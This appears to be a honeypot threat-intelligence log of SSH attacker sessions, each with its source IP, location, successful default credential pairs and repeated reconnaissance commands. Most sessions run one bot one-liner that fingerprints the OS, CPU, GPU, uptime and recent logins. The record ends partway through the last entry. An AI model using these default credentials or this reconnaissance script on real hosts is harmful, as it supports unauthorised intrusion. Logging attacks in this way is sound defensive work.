export → uname → cat (repeated export 9x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×9

$ uname -s -v -n -m 2 > /dev/null ×9

$ uname -m 2 > /dev/null ×9

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×9

🎭 liberty_root_20 (206.189.187.166) — North Bergen, United States · 8 sessions · 32 cmds

2026-03-01 19:20 EST · as deploy/deploy, guest/guest, mysql/mysql

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 eagle_root_26 (68.183.101.140) — North Bergen, United States · 6 sessions · 24 cmds

2026-03-01 19:10 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 liberty_root_21 (134.199.205.57) — Douglasville, United States · 6 sessions · 24 cmds

2026-03-01 19:11 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 samba_sol (131.72.152.46) — Alto Paraíso, Brazil · 2 sessions · 2 cmds

2026-03-01 18:42 EST · as pi/pi, pi/raspberry

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -a ×2

↳ OS/kernel identification

🎭 liberty_root_6 (161.35.14.113) — North Bergen, United States · 9 sessions · 36 cmds

2026-03-01 18:13 EST · as deploy/deploy, guest/guest, mysql/mysql

export → uname → cat (repeated export 9x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×9

$ uname -s -v -n -m 2 > /dev/null ×9

$ uname -m 2 > /dev/null ×9

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×9

🎭 lotus_root_3 (159.65.155.223) — Bengaluru, India · 4 sessions · 16 cmds

2026-03-01 18:33 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 tea_root_15 (161.35.166.159) — Slough, United Kingdom · 2 sessions · 8 cmds

2026-03-01 18:29 EST · as root/1234, root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 star_root_7 (134.199.201.172) — Douglasville, United States · 8 sessions · 32 cmds

2026-03-01 18:16 EST · as deploy/deploy, guest/guest, mysql/mysql

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 star_root_26 (159.203.114.87) — Clifton, United States · 3 sessions · 12 cmds

2026-03-01 18:14 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 eagle_root_27 (165.245.135.205) — Douglasville, United States · 5 sessions · 20 cmds

2026-03-01 17:49 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 outback_root_7 (134.199.171.154) — Sydney, Australia · 1 session · 4 cmds

2026-03-01 17:50 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 yankee_root_21 (137.184.1.239) — Santa Clara, United States · 5 sessions · 20 cmds

2026-03-01 17:21 EST · as deploy/deploy, oracle/oracle, postgres/postgres

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 liberty_root_22 (167.99.14.233) — North Bergen, United States · 6 sessions · 24 cmds

2026-03-01 17:16 EST · as deploy/deploy, oracle/oracle, postgres/postgres

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 bike_root_16 (64.227.67.200) — Amsterdam, Netherlands · 1 session · 4 cmds

2026-03-01 17:13 EST · as admin/123456

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 spice_root_19 (139.59.73.225) — Bengaluru, India · 2 sessions · 8 cmds

2026-03-01 17:09 EST · as admin/admin, admin/admin123

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 tulip_root_8 (167.172.39.1) — Amsterdam, Netherlands · 9 sessions · 36 cmds

2026-03-01 15:56 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 9x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×9

$ uname -s -v -n -m 2 > /dev/null ×9

$ uname -m 2 > /dev/null ×9

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×9

🎭 rogue_root_54 (146.190.81.67) — Singapore, Singapore · 3 sessions · 12 cmds

2026-03-01 16:42 EST · as admin/123456, admin/admin123, admin/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 burger_root_14 (134.199.193.198) — Douglasville, United States · 11 sessions · 44 cmds

2026-03-01 16:10 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 11x)

